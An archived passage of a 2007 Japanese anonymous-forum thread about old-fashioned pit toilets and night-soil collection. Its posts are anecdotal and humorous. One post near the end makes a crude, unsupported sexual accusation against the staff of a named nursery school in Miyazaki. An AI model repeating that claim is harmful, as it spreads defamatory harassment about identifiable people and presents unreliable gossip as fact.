うんこできないよりはいいでしょ
漏らすよりはマシですよねー(水洗なんて贅沢だ)!!

148 :名無しの権兵衛さん:2007/09/19(水) 21:30:22 ID:fUH1Y0wl
>>16
家の便所には尻を物々と刺す虫なんかいないぞ
冬にもかかわらず
夜中の1時30分頃、ねずみとか、こおろぎみたいなのがウロウロしてるが。(笑)

149 :名無しの権兵衛さん:2007/09/19(水) 21:32:28 ID:fUH1Y0wl
家は東京の外れ
便所に田舎も都会も へったくりもない
できれば いいんだよ・・・

150 :名無しの権兵衛さん:2007/09/20(木) 19:40:53 ID:9YnolmQp
お百姓さんはすごいな 手袋もはめず素手で汲み取ってるよ。この前家のカギを落としてしまった時、
ちょうど汲み取りに来てくれて そのことを言ったら 柄杓でさぐりながら「あったよ」と言って
素手でこえたごの中のカギを取り出してくれたよ。町中のバキュームカーだとそのまま吸い込まれて
しまうところだった。
しかしいつも思うんだが 便所がまんぱいになって汲み取った時ちょうどこえたご2つ分になるのが
昔の人はよく考えたものだ。

151 :名無しの権兵衛さん:2007/10/11(木) 23:04:33 ID:uQMt+Z0H
オイラの実家は青森だが、オイラの家は水洗だが?最近、下水道ができたにも関わらず、隣近所はお金がないからまだボットンのまま
月1で早朝からバキュームカーに乗ったオッサン達が「おー、くみとりに来ただー」と大声をあげやがる。
迷惑なんだよ!

152 :名無しの権兵衛さん:2007/10/30(火) 21:46:09 ID:YZmrH2Lt
ここって、徳島県にふさわしいスレとオモタ.

153 :名無しの権兵衛さん:2007/11/04(日) 01:39:21 ID:RrGf75Hw
そうなんだ?

154 :名無しの権兵衛さん:2007/11/04(日) 10:43:51 ID:UctQ6Rui
宮崎 延岡 愛宕○保園の保母達!父兄の便所で有名だぜ。これマジ!合コンならぬヤリコン誘えば一発OK!

31 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)